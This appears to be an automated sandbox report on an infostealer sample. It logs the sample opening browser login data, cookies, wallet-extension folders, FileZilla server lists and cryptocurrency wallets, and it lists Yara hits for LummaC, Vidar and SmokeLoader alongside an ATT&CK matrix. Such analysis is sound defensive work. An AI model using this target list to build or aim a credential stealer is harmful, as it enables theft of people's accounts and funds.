Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\A247.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior

Source: Yara match	File source: 00000005.00000003.2678333691.0000000000913000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3157954757.0000000000572000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: A247.exe PID: 6204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kat2225.tmp PID: 6716, type: MEMORYSTR

Remote Access Functionality

Yara detected CryptOne packer

Source: Yara match

File source: 00000008.00000002.2674561163.00000000043B9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: A247.exe PID: 6204, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.2056480507.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2056438755.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2319442146.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 8.2.5358.exe.4387719.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.5358.exe.2590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.5358.exe.4387719.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.5358.exe.45b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.5358.exe.45b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.5358.exe.2590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5358.exe PID: 4296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kat2225.tmp PID: 6716, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD70C40 sqlite3_bind_zeroblob,	9_2_6CD70C40
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD70D60 sqlite3_bind_parameter_name,	9_2_6CD70D60
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC98EA0 sqlite3_clear_bindings,	9_2_6CC98EA0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD70B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	9_2_6CD70B40
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC96410 bind,WSAGetLastError,	9_2_6CC96410
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC960B0 listen,WSAGetLastError,	9_2_6CC960B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC9C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	9_2_6CC9C050
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC96070 PR_Listen,	9_2_6CC96070
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC9C030 sqlite3_bind_parameter_count,	9_2_6CC9C030
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC222D0 sqlite3_bind_blob,	9_2_6CC222D0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC963C0 PR_Bind,	9_2_6CC963C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	812 Process Injection	3 Obfuscated Files or Information	1 Credentials in Registry	12 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	2 Software Packing	Security Account Manager	37 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
